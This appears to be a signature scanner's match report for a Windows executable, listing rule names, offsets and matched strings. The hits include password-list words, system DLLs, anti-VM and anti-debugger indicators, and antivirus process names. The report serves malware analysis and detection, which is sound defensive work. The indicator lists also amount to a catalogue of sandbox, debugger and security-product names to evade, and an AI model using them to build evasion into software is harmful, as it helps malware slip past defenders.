27 0x1010e9 0x10768c 0x1082ce 0x10cfde 0x10d17c 0x11ea39 0x11f26b 0x12381e 0x124067 0x12410a 0x129dfa 0x129e18 0x12db07 0x12db8c 0x12dd99 0x12de80 0x1326ea 0x13a0f9 0x13e577 0x144695 0x148117 0x14ab4e 0x14abfc 0x14dbfe 0x19e7a9 0x1a1838 0x1a230d 0x1a316b Top1000Passwords windows None any of them
8 0x114877 0x1156ad 0x14027a 0x145f6a 0x145f8a 0x145fa2 0x14a0ac 0x14b012 0x1aa591 Top1000Passwords WINDOWS None any of them
0 0x1428d8 Top1000Passwords WINDOWS None any of them
0 0x14de29 Top1000Passwords WIndows None any of them
16 0x65203 0x66e04 0x66fd4 0xf8a38 0xf9fbf 0xfa008 0xfb74a 0xfb754 0xfde61 0x118648 0x11af9a 0x11b07f 0x11b5e2 0x11c35d 0x1429c3 0x19aaac 0x19aabc Top1000Passwords 456789 None any of them
1 0x117e73 0x117ebb Top1000Passwords 456789 None any of them
0 0x11d822 Top1000Passwords 1975 None any of them
0 0x14fc9a Top1000Passwords BOBBY None any of them
0 0x14d19f Top1000Passwords NewPort None any of them
0 0x19ed33 Top1000Passwords Daddy None any of them
0 0x1a4ca9 Top1000Passwords daddy None any of them
3 0x67a20 0x67a38 0x67a60 0x67c00 Top1000Passwords american None any of them
6 0x64823 0x648d4 0x648f4 0x120201 0x14dad1 0x1a34bc 0x1a7e6a Top1000Passwords eric None any of them
0 0x651a4 Top1000Passwords ERIC None any of them
4 0x67a24 0x67a3c 0x67a64 0x67c04 0x683cc Top1000Passwords eric None any of them
0 0x132a58 Top1000Passwords ERIC None any of them
0 0x141fdb Top1000Passwords eRic None any of them
0 0x14a99c Top1000Passwords Eric None any of them
0 0x1a7e62 Top1000Passwords Alpha None any of them
6 0x106939 0x10696b 0x106be1 0x106f68 0x106f85 0x140cb1 0x161c0a Top1000Passwords HARD None any of them
0 0x10858a Top1000Passwords Hard None any of them
4 0x113dc2 0x140cbd 0x140cce 0x149657 0x1a54dd Top1000Passwords hard None any of them
0 0x11f89b Top1000Passwords hard None any of them
0 0x143b03 Top1000Passwords Hard None any of them
1 0x68418 0x1436a4 Top1000Passwords england None any of them
0 0x6800e Top1000Passwords brazil None any of them
0 0x107f46 BitCoin bitcoin None any of them
2 0x11ee27 0x11ee41 0x11ee5b ActiveX_Interface_Marshaling_Library_Detection_1 actxprxy.Dll None any of them
0 0x639d8 Advanced_Windows_32_Base_API_Detection_1 advapi32.dll None any of them
2 0x1076d6 0x13299f 0x1aaeaf Advanced_Windows_32_Base_API_Detection_1 Advapi32.dll None any of them
0 0x10840a Advanced_Windows_32_Base_API_Detection_1 advapi32.dll None any of them
0 0x133fc4 Advanced_Windows_32_Base_API_Detection_1 ADVAPI32.dll None any of them
0 0x146da4 Advanced_Windows_32_Base_API_Detection_1 ADVAPI32.DLL None any of them
0 0x18f435 Advanced_Windows_32_Base_API_Detection_1 AdvApi32.dll None any of them
0 0x12651d PlugProject_DLL_Detection_1 all.dll None any of them
0 0x63980 ApiSet_Stub_DLL_Detection_108 api-ms-win-core-registry-l1-1-0.dll None any of them
2 0x103abe 0x107973 0x12973f api_dll_Detection_1 API.dll None any of them
9 0x107df2 0x11495d 0x116dd5 0x12a61b 0x133cc1 0x133cdf 0x1400de 0x140147 0x14c818 0x14d0a8 api_dll_Detection_1 api.dll None any of them
0 0x116d08 api_dll_Detection_1 Api.dll None any of them
0 0x12a72d api_dll_Detection_1 API.DLL None any of them
0 0x14c8fd api_dll_Detection_1 api.DLL None any of them
0 0x639de EDIABAS_Server_Interface_for_Win32_Detection_1 api32.dll None any of them
7 0x1076d9 0x108247 0x10840d 0x1147c0 0x12f8e7 0x1329a2 0x13decd 0x1aaeb2 EDIABAS_Server_Interface_for_Win32_Detection_1 api32.dll None any of them
0 0x133fc7 EDIABAS_Server_Interface_for_Win32_Detection_1 API32.dll None any of them
0 0x146da7 EDIABAS_Server_Interface_for_Win32_Detection_1 API32.DLL None any of them
0 0x18f438 EDIABAS_Server_Interface_for_Win32_Detection_1 Api32.dll None any of them
0 0x10c970 Windows_NT_OpenType_Type_1_Font_Driver_Detection_1 atmfd.dll None any of them
0 0x1083a6 AVI_Capture_window_class_Detection_1 avicap32.dll None any of them
1 0x117124 0x14b2d2 avast_English_Basic_Module_Detection_1 BASE.dll None any of them
0 0x13eabf avast_English_Basic_Module_Detection_1 base.dll None any of them
0 0x14029b avast_English_Basic_Module_Detection_1 base.dll None any of them
0 0x133c88 Microsoft_Cabinet_File_API_Detection_1 Cabinet.dll None any of them
1 0x10ca02 0x10ca15 Code_Integrity_Module_Detection_1 CI.dll None any of them
0 0xf9f3a UnKnown_Detection_93 client.dll None any of them
0 0x13ded6 Microsoft_Connection_Manager_Phonebook_Detection_1 cmpbk32.dll None any of them
0 0x14013a Microsoft_Connection_Manager_Utility_Lib_Detection_1 cmutil.dll None any of them
0 0xff5d6 Get_Connected_Wizards_Detection_1 Connect.dll None any of them
0 0xf9e36 Multi_Theft_Auto_Module_Detection_1 core.dll None any of them
0 0x170f2d Multi_Theft_Auto_Module_Detection_1 Core.dll None any of them
0 0x1152a5 Crash_Report_Module_Detection_1 CrashReport.dll None any of them
0 0x10ca88 Microsoft_C_Runtime_Library_Detection_1 CRTDLL.DLL None any of them
1 0x14aa2e 0x1709d0 Microsoft_C_Runtime_Library_Detection_1 CRTDLL.dll None any of them
0 0x107e6a _32_bitars_kryptografi_API_Detection_1 Crypt32.dll None any of them
0 0x108742 _32_bitars_kryptografi_API_Detection_1 crypt32.dll None any of them
1 0x11711a 0x14b2c8 Base_cryptographic_API_DLL_Detection_1 CRYPTBASE.dll None any of them
0 0x140296 Base_cryptographic_API_DLL_Detection_1 cryptbase.dll None any of them
0 0x108c31 Cryptography_Manager_Detection_1 cryptdll.dll None any of them
0 0x13ce9a InstallShield_R_Ctor_DLL_Detection_1 ctor.dll None any of them
0 0x1709de Cygwin_POSIX_Emulation_DLL_Detection_1 cygwin1.dll None any of them
0 0x1068f6 Windows_Image_Helper_Detection_2 dbghelp.dll None any of them
0 0x146532 Debug_Detection_3 Debug.dll None any of them
0 0x10567f Sammanfattning_av_SSPI_autentiseringspaket_Detection_1 digest.dll None any of them
0 0x107def DNS_Client_API_DLL_Detection_1 Dnsapi.dll None any of them
0 0x11495a DNS_Client_API_DLL_Detection_1 dnsapi.dll None any of them
0 0x116d05 DNS_Client_API_DLL_Detection_1 DnsApi.dll None any of them
0 0x12973c DNS_Client_API_DLL_Detection_1 DNSAPI.dll None any of them
0 0x149a55 UnKnown_Detection_192 dump.dll None any of them
1 0x133cbe 0x133cdc Microsoft_Desktop_Window_Manager_API_Detection_1 dwmapi.dll None any of them
0 0xff5ca UnKnown_Detection_207 en.dll None any of them
0 0x114b75 Windows_Error_Reporting_Service_Detection_1 ERSVC.DLL None any of them
2 0x1174cc 0x13ce04 0x143038 COM__Detection_3 es.dll None any of them
0 0x10796b Windows_Firewall_API_Detection_1 FirewallAPI.dll None any of them
0 0x115131 Fax_Service_Detection_1 fxsst.dll None any of them
2 0x107fc1 0x1587be 0x18f44f GDI_Client_DLL_Detection_1 Gdi32.dll None any of them
0 0x10c967 GDI_Client_DLL_Detection_1 GDI32.DLL None any of them
1 0x158514 0x158665 GDI_Client_DLL_Detection_1 GDI32.dll None any of them
0 0x1400e5 OpenGL_Metafiling_DLL_Detection_1 glmf32.dll None any of them
1 0x11f3d6 0x12f29d Hardware_Abstraction_Layer_DLL_Detection_1 HAL.dll None any of them
0 0x12cfbf Hardware_Abstraction_Layer_DLL_Detection_1 hal.dll None any of them
0 0x13a7ad hccutils_Module_Detection_1 hccutils.DLL None any of them
0 0x14aa5c Host_Library_Detection_1 Helper.DLL None any of them
0 0x14aaba Host_Library_Detection_1 Helper.dll None any of them
0 0x116c0e Hid_User_Library_Detection_1 hid.dll None any of them
0 0x116c78 Hid_User_Library_Detection_1 HID.dll None any of them
0 0x11ebee Home_Networking_Configuration_Manager_Detection_1 hnetcfg.dll None any of them
1 0x106b97 0x14fd61 CapsAndNumKeyNotify_Detection_1 Hook.dll None any of them
0 0x12ef9c CapsAndNumKeyNotify_Detection_1 HOOK.DLL None any of them
0 0x146a96 CapsAndNumKeyNotify_Detection_1 Hook.DLL None any of them
0 0x11551e ICMP_DLL_Detection_1 ICMP.DLL None any of them
0 0x13a7b2 User_Location_Services_Component_Module_Detection_1 ils.DLL None any of them
0 0x1169ee Windows_NT_Image_Helper_Detection_1 imagehlp.dll None any of them
1 0x14d0b0 0x14e9a5 Garena_Inject_Detection_1 Inject.Dll None any of them
0 0x116dd0 IP_Helper_API_Detection_1 iphlpapi.dll None any of them
0 0x14c8f8 IP_Helper_API_Detection_1 iphlpapi.DLL None any of them
0 0x105667 Kerberos_Security_Package_Detection_1 kerberos.dll None any of them
0 0x102cd0 UnKnown_Detection_344 kernel.dll None any of them
17 0x7c126 0x103975 0x1531de 0x153722 0x153dc3 0x1541e5 0x1584fa 0x15864b 0x159b5d 0x15d10f 0x16e75a 0x171b4d 0x17b84d 0x17f1b4 0x17fe26 0x17ff14 0x184aab 0x19074a Windows_NT_BASE_API_Client_DLL_Detection_1 KERNEL32.dll None any of them
12 0x106d6a 0x154db0 0x15557f 0x1587dc 0x159872 0x15d806 0x15da49 0x15db43 0x169392 0x175152 0x188917 0x18a8a6 0x18f41d Windows_NT_BASE_API_Client_DLL_Detection_1 Kernel32.dll None any of them
47 0x108475 0x11f27e 0x12ff06 0x130942 0x130a06 0x13d700 0x144887 0x153837 0x154e3e 0x15e0e0 0x15ee55 0x160fc3 0x161a81 0x161b0e 0x161e5a 0x161f5b 0x1623d8 0x163dcd 0x165541 0x1697d3 0x16ab1a 0x16e37b 0x16f9d2 0x16fdb1 0x17005e 0x172971 0x172a2d 0x172ff4 0x17a0bc 0x17a36e 0x17bf90 0x17c50c 0x17d082 0x17e511 0x180a69 0x180f53 0x18106a 0x1811ea 0x18502d 0x1860f0 0x186c70 0x18ae89 0x18c394 0x18d3a2 0x18d3f7 0x192c8e 0x193930 0x1ab201 Windows_NT_BASE_API_Client_DLL_Detection_1 kernel32.dll None any of them
0 0x114564 Windows_NT_BASE_API_Client_DLL_Detection_1 KerNel32.dll None any of them
0 0x1165f9 Windows_NT_BASE_API_Client_DLL_Detection_1 KERNEL32.DLL None any of them
1 0x116a17 0x133a6e Windows_NT_BASE_API_Client_DLL_Detection_1 kernel32.dll None any of them
15 0x145248 0x1546a6 0x1546c4 0x15e5a1 0x15fcf4 0x161733 0x16607a 0x16c564 0x16f468 0x171c39 0x172e79 0x180920 0x1809aa 0x1843a6 0x18b496 0x18ea6e Windows_NT_BASE_API_Client_DLL_Detection_1 KERNEL32.DLL None any of them
2 0x15f035 0x17cde9 0x18865d Windows_NT_BASE_API_Client_DLL_Detection_1 kErNeL32.dLl None any of them
4 0x160cdc 0x16ac4f 0x16aca4 0x16f3d3 0x17608b Windows_NT_BASE_API_Client_DLL_Detection_1 KeRnEl32.dLl None any of them
0 0x107e46 OpenSSL_Shared_Library_Detection_2 libeay32.dll None any of them
0 0x107e52 UnKnown_Detection_404 libssl32.dll None any of them
0 0x105673 Live_Security_Package_Detection_1 livessp.dll None any of them
1 0x105163 0x106905 Migration_Logging_Interface_Detection_1 log.dll None any of them
0 0x105692 Server_DLL_fr_LSA_Detection_1 lsasrv.dll None any of them
1 0x149523 0x149672 Server_DLL_fr_LSA_Detection_1 LSASRV.DLL None any of them
1 0x133cc0 0x133cde UnKnown_Detection_443 mapi.dll None any of them
0 0x1147bf Extended_MAPI_1_0_for_Windows_NT_Detection_1 mapi32.dll None any of them
0 0x144545 UnKnown_Detection_473 mozglue.dll None any of them
0 0x140144 Windows_NT_MP_Router_Administration_DLL_Detection_1 mprapi.dll None any of them
0 0x15192f Microsoft_ACM_Audio_Filter_Detection_1 MSACM32.dll None any of them
1 0x65048 0x12d8f7 Microsoft_NET_Runtime_Execution_Engine_Detection_1 mscoree.dll None any of them
2 0x157915 0x159b79 0x161695 Microsoft_NET_Runtime_Execution_Engine_Detection_1 mscoree.dll None any of them
0 0xfc1a1 Inloggnings_GINA_fr_Windows_NT_Detection_1 msgina.dll None any of them
1 0x1276a8 0x127700 Microsoft_R_HTML_Viewer_Detection_1 mshtml.dll None any of them
2 0x105f7b 0x127508 0x127515 Windows_Installer_Detection_1 msi.dll None any of them
0 0x118a6f Windows_Installer_Detection_1 MSI.dll None any of them
0 0x1400cf Ports_Class_Installer_Detection_1 msports.dll None any of them
0 0x14c42e Visual_Basic_Virtual_Machine_Detection_1 MSVBVM50.DLL None any of them
0 0x145b4e Visual_Basic_Virtual_Machine_Detection_2 msvbvm60.dll None any of them
0 0x116eef Microsoft_R_C_Runtime_Library_Detection_3 MSVCP60.DLL None any of them
0 0x133fee Microsoft_C_Runtime_Library_Detection_29 MSVCR120.dll None any of them
0 0x133d88 Microsoft_C_Runtime_Library_Detection_30 MSVCR120D.dll None any of them
0 0x654c0 Windows_NT_CRT_DLL_Detection_1 msvcrt.dll None any of them
3 0x103981 0x1709be 0x17b8bd 0x184b3d Windows_NT_CRT_DLL_Detection_1 MSVCRT.dll None any of them
0 0x170a09 Windows_NT_CRT_DLL_Detection_1 msvcrt.dll None any of them
0 0xfa5ad Microsoft_Windows_Sockets_2_0_Service_Provider_Detection_2 mswsock.dll None any of them
0 0x107793 Microsoft_Windows_Sockets_2_0_Service_Provider_Detection_2 Mswsock.dll None any of them
0 0x1400da Network_DDE_Share_Management_APIs_Detection_1 nddeapi.dll None any of them
3 0xf9c3c 0x1047e2 0x107c9b 0x133c8c Java_TM_Platform_SE_binary_Detection_3 net.dll None any of them
0 0x101d8e Java_TM_Platform_SE_binary_Detection_3 net.dll None any of them
0 0x1318f1 Java_TM_Platform_SE_binary_Detection_3 NET.dll None any of them
0 0x14a36f Java_TM_Platform_SE_binary_Detection_3 NET.DLL None any of them
0 0x108244 Net_Win32_API_DLL_Detection_1 netapi32.dll None any of them
0 0x12bdc8 libcurl_Shared_Library_Detection_3 Network.dll None any of them
0 0x1313b0 NSPR_Library_Detection_1 nspr4.dll None any of them
0 0x1313b9 UnKnown_Detection_510 nss3.dll None any of them
0 0xfa5a4 NT_Layer_DLL_Detection_1 ntdll.dll None any of them
0 0x114b7e Shell_extensions_for_sharing_Detection_2 ntshrui.dll None any of them
0 0x107ee6 NVIDIA_Compatible_CUDA_Driver_Version_175_16_Detection_1 nvcuda.dll None any of them
0 0x1489e2 Microsoft_ODBC_Driver_Manager_Detection_1 odbc32.dll None any of them
0 0x7c16a Microsoft_OLE_for_Windows_Detection_1 ole32.dll None any of them
0 0x129795 Microsoft_OLE_for_Windows_Detection_1 OLE32.DLL None any of them
0 0x14b272 Microsoft_OLE_for_Windows_Detection_1 ole32.dll None any of them
0 0x18f459 Microsoft_OLE_for_Windows_Detection_1 Ole32.dll None any of them
0 0x146dd2 UnKnown_Detection_530 OLEAUT32.DLL None any of them
0 0x18f442 UnKnown_Detection_530 Oleaut32.dll None any of them
0 0x107edc OpenCL_Client_DLL_Detection_1 OpenCL.dll None any of them
0 0x107ef0 OpenGL_Client_DLL_Detection_1 opengl32.dll None any of them
0 0x1081e8 packet_dll_Vista_Dynamic_Link_Library_Detection_1 packet.dll None any of them
0 0x144c20 packet_dll_Vista_Dynamic_Link_Library_Detection_1 packet.dll None any of them
0 0x1275a5 Photoshop_Plugin_Utilities_Detection_1 Plugin.dll None any of them
0 0x10322a IE_PNG_plugin_image_decoder_Detection_1 pngfilt.Dll None any of them
2 0x12a619 0x14c816 0x14d0a6 Process_Status_Helper_Detection_1 psapi.dll None any of them
0 0x12a72b Process_Status_Helper_Detection_1 PSAPI.DLL None any of them
0 0x106919 Deprecated_Protected_Storage_COM_interfaces_Detection_1 pstorec.dll None any of them
0 0x12c38c Python_Core_Detection_6 python27.dll None any of them
0 0x170f2a C_application_development_framework__Detection_6 Qt5Core.dll None any of them
0 0x170f3d C_application_development_framework__Detection_37 QtCore4.dll None any of them
0 0x140146 Mobile_Device_Remote_API_Detection_1 rapi.dll None any of them
1 0x104fe9 0x148c0a UnKnown_Detection_604 rld.dll None any of them
0 0x14bd13 Remote_Procedure_Call_Runtime_Detection_1 RPCRT4.DLL None any of them
0 0x13e6b9 Distributed_COM_Services_Detection_1 Rpcss.dll None any of them
0 0x13f729 SAM_Server_DLL_Detection_1 samsrv.dll None any of them
4 0x107df1 0x11495c 0x12a61a 0x14c817 0x14d0a7 Speech_API_Detection_1 sapi.dll None any of them
0 0x116d07 Speech_API_Detection_1 sApi.dll None any of them
0 0x12973e Speech_API_Detection_1 SAPI.dll None any of them
0 0x12a72c Speech_API_Detection_1 SAPI.DLL None any of them
0 0x12ef1d TLS_SSL_Security_Provider_Detection_1 SCHANNEL.DLL None any of them
0 0x131429 Microsoft_Win32_Security_Services_Detection_1 Secur32.dll None any of them
1 0x103a0e 0x13140b Windows_Shell_Common_Dll_Detection_1 SHELL32.dll None any of them
2 0x10735c 0x129481 0x17d0d6 Windows_Shell_Common_Dll_Detection_1 Shell32.dll None any of them
0 0x12d10d Windows_Shell_Common_Dll_Detection_1 SHELL32.DLL None any of them
1 0x12f9a8 0x12f9e0 Windows_Shell_Common_Dll_Detection_1 SHELL32.DLL None any of them
0 0x133a86 Windows_Shell_Common_Dll_Detection_1 shell32.dll None any of them
0 0x103aba Shell_Light_weight_Utility_Library_Detection_1 SHLWAPI.dll None any of them
0 0x13eab4 SQLite3_Dynamic_Link_Library_Detection_1 sqlite3.dll None any of them
0 0x117ba7 SQL_Server_ODBC_Driver_Detection_1 sqlsrv32.dll None any of them
0 0x107e3a OpenSSL_shared_library_Detection_4 ssleay32.dll None any of them
0 0xfd898 Superfetch_Service_Host_Detection_1 sysmain.dll None any of them
0 0x108246 Microsoft_Windows_TM_Telephony_API_Client_DLL_Detection_1 tapi32.dll None any of them
0 0x126866 Remote_Desktop_Session_Host_Server_Remote_Connections_Manager_Detection_1 termsrv.dll None any of them
0 0x12759d Setup_Test_Module_Plugin_Detection_1 TestPlugin.dll None any of them
0 0x105689 Web_Service_Security_Package_Detection_1 tspkg.dll None any of them
1 0x103bd4 0x114b83 UnKnown_Detection_683 ui.dll None any of them
0 0x107cd2 OLE32_tillgg_fr_Win32_Detection_1 urlmon.dll None any of them
2 0x107fca 0x1587a0 0x18f42a Multi_User_Windows_USER_API_Client_DLL_Detection_1 User32.dll None any of them
9 0x108500 0x146f16 0x154eba 0x15627e 0x15f849 0x16abc6 0x17a41a 0x181077 0x18503a 0x185631 Multi_User_Windows_USER_API_Client_DLL_Detection_1 user32.dll None any of them
0 0x10c949 Multi_User_Windows_USER_API_Client_DLL_Detection_1 user32.dll None any of them
0 0x12d8e3 Multi_User_Windows_USER_API_Client_DLL_Detection_1 USER32.DLL None any of them
0 0x1428fe Multi_User_Windows_USER_API_Client_DLL_Detection_1 UsEr32.dLl None any of them
2 0x14316f 0x15e5c2 0x1883ff Multi_User_Windows_USER_API_Client_DLL_Detection_1 USER32.DLL None any of them
6 0x158508 0x158659 0x16a0d5 0x17b543 0x17b869 0x18027b 0x184ad5 Multi_User_Windows_USER_API_Client_DLL_Detection_1 USER32.dll None any of them
0 0x146dd6 UnKnown_Detection_698 UT32.DLL None any of them
0 0x18f446 UnKnown_Detection_698 ut32.dll None any of them
0 0x106b93 VirtualBox_Hook_Driver_Detection_1 VBoxHook.dll None any of them
2 0x116e87 0x126209 0x12d737 UnKnown_Detection_714 ver.dll None any of them
0 0x146db0 Version_Checking_and_File_Installation_Libraries_Detection_1 VERSION.DLL None any of them
0 0x10567e Microsoft_Digest_Access_Detection_1 wdigest.dll None any of them
0 0x117502 Stillbildsenhetstjnst_Detection_1 wiaservc.dll None any of them
0 0xf9c38 Internet_Extensions_for_Win32_Detection_1 Wininet.dll None any of them
0 0x107c97 Internet_Extensions_for_Win32_Detection_1 wininet.dll None any of them
0 0x1318ed Internet_Extensions_for_Win32_Detection_1 WININET.dll None any of them
0 0x14a36b Internet_Extensions_for_Win32_Detection_1 WININET.DLL None any of them
0 0x108144 MCI_API_DLL_Detection_1 winmm.dll None any of them
0 0x13f6b6 Microsoft_Smart_Card_API_Detection_1 WinSCard.dll None any of them
0 0x11d540 Multi_User_Windows_Server_DLL_Detection_1 winsrv.dll None any of them
0 0xfde30 Windows_Media_Screen_Encoder_Detection_1 wmsdmoe.dll None any of them
0 0x1081f9 wpcap_dll_Dynamic_Link_Library_based_on_libpcap_0_9_6_branch_Detection_1 wpcap.dll None any of them
0 0x10773f Windows_Socket_2_0_32_Bit_DLL_Detection_1 Ws2_32.dll None any of them
0 0x129731 Windows_Socket_2_0_32_Bit_DLL_Detection_1 WS2_32.dll None any of them
0 0x130969 Windows_Socket_2_0_32_Bit_DLL_Detection_1 ws2_32.dll None any of them
0 0x14a361 Windows_Socket_2_0_32_Bit_DLL_Detection_1 WS2_32.DLL None any of them
0 0x107753 Windows_Socket_32_Bit_DLL_Detection_1 wsock32.dll None any of them
0 0x1318e2 Windows_Socket_32_Bit_DLL_Detection_1 WSock32.dll None any of them
0 0x146dbb Windows_Socket_32_Bit_DLL_Detection_1 WSOCK32.DLL None any of them
0 0x1aa753 Windows_Socket_32_Bit_DLL_Detection_1 WSOCK32.dll None any of them
0 0x13deca Windows_Remote_Desktop_Session_Host_Server_SDK_APIs_Detection_1 wtsapi32.dll None any of them
0 0x113e25 Windows_Update_AutoUpdate_Service_Detection_1 wuauserv.dll None any of them
0 0x147366 MS_DTC_helper_APIs_DLL_Detection_1 XOLEHLP.dll None any of them
0 0x0 Windows_DOS_executable_file_EXE MZ None $1 at 0
0 0x106a72 AntiVMGeneric  None any of them
0 0x106a6e AntiVMGeneric E None any of them
1 0xfbcda 0x12f015 AntiVMGeneric SBieDll.dll None any of them
0 0x1068eb AntiVMGeneric sbiedll.dll None any of them
0 0x106ed6 AntiVMGeneric SbieDLL.dll None any of them
0 0x1068f6 AntiVMGeneric dbghelp.dll None any of them
0 0x106901 AntiVMGeneric api_log.dll None any of them
0 0x10690c AntiVMGeneric dir_watch.dll None any of them
0 0x106919 AntiVMGeneric pstorec.dll None any of them
0 0x106924 AntiVMGeneric vmcheck.dll None any of them
0 0x10692f AntiVMGeneric wpespy.dll None any of them
0 0x70fd2 VBOX_MAC_Address_CouldBeFP ' None any of them
0 0x106c49 VBOX_MAC_Address_CouldBeFP 08:00:27 None any of them
0 0x106c41 VBOX_MAC_Address_CouldBeFP 08-00-27 None any of them
0 0x108607 VMWare_2 vmware2 None any of them
1 0x10860e 0x10860e VMWare_2 vmount2 None any of them
1 0x108615 0x108615 VMWare_2 vmusrvc None any of them
1 0x106aeb 0x106aeb VMWare_2 vmsrvc None any of them
0 0x106a7a VMWare_2 Ven_VMware_ None any of them
0 0x106a85 VMWare_2 Prod_VMware_Virtual_ None any of them
0 0x1085f2 VMWare_2 vmhgfs.sys None any of them
0 0x106aeb VMWare_2 vmsrvc.sys None any of them
0 0x106af5 VMWare_2 vmx86.sys None any of them
0 0x106afe VMWare_2 vmnet.sys None any of them
0 0x106b07 VMWare_2 vmicheartbeat None any of them
0 0x106b14 VMWare_2 vmicvss None any of them
0 0x106b1b VMWare_2 vmicshutdown None any of them
0 0x106b27 VMWare_2 vmicexchange None any of them
0 0x106b33 VMWare_2 vmdebug None any of them
1 0x106b3a 0x10856c VMWare_2 vmmouse None any of them
0 0x106b41 VMWare_2 vmtools None any of them
0 0x108600 VMWare_2 VMTools None any of them
0 0x106b48 VMWare_2 VMMEMCTL None any of them
0 0x106af5 VMWare_2 vmx86 None any of them
5 0x106a11 0x106a21 0x106a2f 0x106a7e 0x106a8a 0x108577 VMWare_2 VMware None any of them
7 0x106b50 0x106d21 0x106f07 0x106f11 0x106f21 0x106f31 0x106f40 0x108607 VMWare_2 vmware None any of them
0 0x106bca VMWare_2 VBoxGuestAdditions None any of them
0 0x106bdc VMWare_2 VBOX HARDDISK None any of them
1 0x106b9f 0x106ef8 VMWare_2 VBoxService None any of them
0 0x10861c VMWare_2 vboxservice None any of them
0 0x106baa VMWare_2 VBoxTray None any of them
0 0x108627 VMWare_2 vboxtray None any of them
0 0x106bf1 VMWare_MAC_Address_CouldBeFP 00:05:69 None any of them
0 0x106be9 VMWare_MAC_Address_CouldBeFP 00-05-69 None any of them
0 0x77d03 VMWare_MAC_Address_CouldBeFP ) None any of them
0 0x106c33 VMWare_MAC_Address_CouldBeFP 00:1C:14 None any of them
0 0x106c2b VMWare_MAC_Address_CouldBeFP 00-1C-14 None any of them
18 0x5fd0a 0x6204a 0x79dc7 0x8d3f5 0x10b6fc 0x1578a6 0x15de1f 0x15de74 0x16aa02 0x16d5fb 0x16ea6d 0x173542 0x17aabd 0x17d48b 0x17e354 0x1844f9 0x185f41 0x187969 0x195c55 VMWare_MAC_Address_CouldBeFP PV None any of them
0 0x106c07 VMWare_MAC_Address_CouldBeFP 00:50:56 None any of them
0 0x106bff VMWare_MAC_Address_CouldBeFP 00-50-56 None any of them
0 0x77dff Parallels_MAC_Address_CouldBeFP B None any of them
0 0x13a718 LitecoinAddress_maybe_FP MicrosoftwudMessageECD4FC4D None $1
0 0x12ae4c NeoAddress_maybe_FP Agency0StartServiceCtrlDispatcherA None $1
0 0x103405 AntiAnalysisGenericBin ? None any of them
0 0x106a52 AntiAnalysisGenericBin VMXh None any of them
0 0x106a6e AntiAnalysisGenericBin E None any of them
0 0x106a72 AntiAnalysisGenericBin  None any of them
0 0x106df8 AntiAnalysisGeneric processhacker.exe None any of them
0 0x106daf AntiAnalysisGeneric processmonitor.exe None any of them
0 0x106da4 AntiAnalysisGeneric procmon.exe None any of them
0 0x106d99 AntiAnalysisGeneric procexp.exe None any of them
0 0x106e09 AntiAnalysisGeneric hiew32.exe None any of them
0 0x106de3 AntiAnalysisGeneric ollydbg.exe None any of them
0 0x106dd9 AntiAnalysisGeneric windbg.exe None any of them
0 0x106dee AntiAnalysisGeneric winhex.exe None any of them
0 0x106dce AntiAnalysisGeneric fiddler.exe None any of them
0 0x106dc1 AntiAnalysisGeneric wireshark.exe None any of them
0 0x103303 VirusDetectionGeneric 360TRAY.EXE None any of them
0 0x11709c VirusDetectionGeneric avp.exe None any of them
0 0x117080 VirusDetectionGeneric kavsvc.exe None any of them
0 0x1027e1 VirusDetectionGeneric RavMon.exe None any of them
1 0x1704cc 0x170535 SHA1 0!0 + None $1
1 0x10876d 0x1647f5 RC4 0w,a None $1
0 0x10b62f AEC c|w{ko None any of them
0 0x117071 SecurityProducts AVGIDSAgent.exe None any of them
0 0x1039e1 SecurityProducts avgtray.exe None any of them
0 0x11709c SecurityProducts avp.exe None any of them
0 0x1070ec SecurityProducts blackd.exe None any of them
0 0x1070f6 SecurityProducts blackice.exe None any of them
0 0x196f8d SecurityProducts chrome.exe None any of them
1 0x106f5e 0x107151 SecurityProducts client.exe None any of them
0 0x114893 SecurityProducts DefWatch None any of them
0 0x114893 SecurityProducts DefWatch.exe None any of them
0 0x13a1d3 SecurityProducts ERA.EXE None any of them
0 0x116478 SecurityProducts firefox.exe None any of them
0 0xfde7c SecurityProducts fmon.exe None any of them
0 0x12455d SecurityProducts Guard.exe None any of them
0 0x117095 SecurityProducts kav.exe None any of them
0 0x117080 SecurityProducts kavsvc.exe None any of them
0 0xf9ae4 SecurityProducts McpRoXy.exe None any of them
0 0x115dcc SecurityProducts MSPUB.EXE None any of them
9 0xfa1f5 0xfa275 0x1138e5 0x1158ba 0x11668d 0x1187c3 0x12492f 0x129572 0x13c489 0x14ee40 SecurityProducts n.exe None any of them
13 0xfc6cc 0xfde7f 0x1027e6 0x104bb4 0x106daa 0x107109 0x12db2f 0x1402e6 0x146b4c 0x14c7ed 0x14d25e 0x14d62a 0x14d80a 0x14e4fe SecurityProducts n.exe None any of them
1 0x116c32 0x116c56 SecurityProducts N.exe None any of them
2 0x129806 0x145f2c 0x14d78a SecurityProducts n.EXE None any of them
0 0x100b28 SecurityProducts outlook.exe None any of them
0 0x1335cc SecurityProducts POWERPNT.exe None any of them
0 0x106d99 SecurityProducts procexp.exe None any of them
0 0x1027e1 SecurityProducts RavMon.exe None any of them
0 0xfde3b SecurityProducts SavService.exe None any of them
40 0xfbff6 0x103462 0x11a445 0x11ab07 0x11ab31 0x11ea30 0x11ea8b 0x120455 0x120dbb 0x1402e3 0x1402f0 0x1452da 0x1456d6 0x14570c 0x145a76 0x147188 0x147f1f 0x148264 0x148d91 0x149d58 0x149d68 0x149e3a 0x14a169 0x14a1cb 0x14b690 0x14b69f 0x14b6ca 0x14b6d9 0x14b7b5 0x14b7e7 0x14b813 0x14b822 0x14b83c 0x14c151 0x14d7b4 0x14e3af 0x14ecc7 0x14f74a 0x14fa90 0x14fed0 0x1a97d6 SecurityProducts Scan None any of them
62 0xfdc1d 0xfdc52 0xfdc74 0x10d1f8 0x114a88 0x1167da 0x11a4a8 0x11a4b2 0x11a4c7 0x11a4e6 0x11a4f2 0x11a9e5 0x11aafa 0x11ab2c 0x11ac51 0x11ad01 0x11c468 0x11c65f 0x11c6b6 0x11c6c7 0x11fe16 0x120482 0x1225e1 0x126a0b 0x13219c 0x140b4a 0x140c5c 0x144058 0x146b55 0x1474c4 0x147528 0x147b86 0x147bbd 0x148223 0x148291 0x148b2e 0x149cdb 0x149cf0 0x149f66 0x14a1d6 0x14b603 0x14b9eb 0x14ba5b 0x14e1f7 0x14eb7a 0x14eb87 0x14eb94 0x14ece6 0x14ecff 0x14ed34 0x14ed90 0x14edd6 0x14ef21 0x14f5fe 0x14f67c 0x14f6d9 0x14f714 0x14f78d 0x14f83c 0x14f8a6 0x1a233e 0x1a5f83 0x1aa45f SecurityProducts scan None any of them
